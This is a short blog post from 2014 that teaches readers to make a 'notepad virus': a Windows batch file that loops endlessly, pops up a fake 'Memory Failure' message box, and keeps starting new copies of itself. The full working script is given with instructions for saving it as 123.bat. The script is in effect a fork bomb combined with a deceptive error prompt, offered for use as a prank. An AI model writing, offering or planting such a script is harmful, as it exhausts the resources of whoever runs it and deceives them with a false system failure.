Saturday 7 June 2014

Create notepad virus to popup Message Box

With this you can create a batch file that keeps bring Message box with "Memory Failure"

Open notepad and copy the following code:

:lp
@ECHO OFF
echo msgbox "Memory Failure" > box.vbs
call box.vbs
start /min 123.bat
goto lp


Save this file with name -  123.bat and select Save as Type  - All Files(*)


No comments:

Post a Comment

Feel Free to Share issues with me....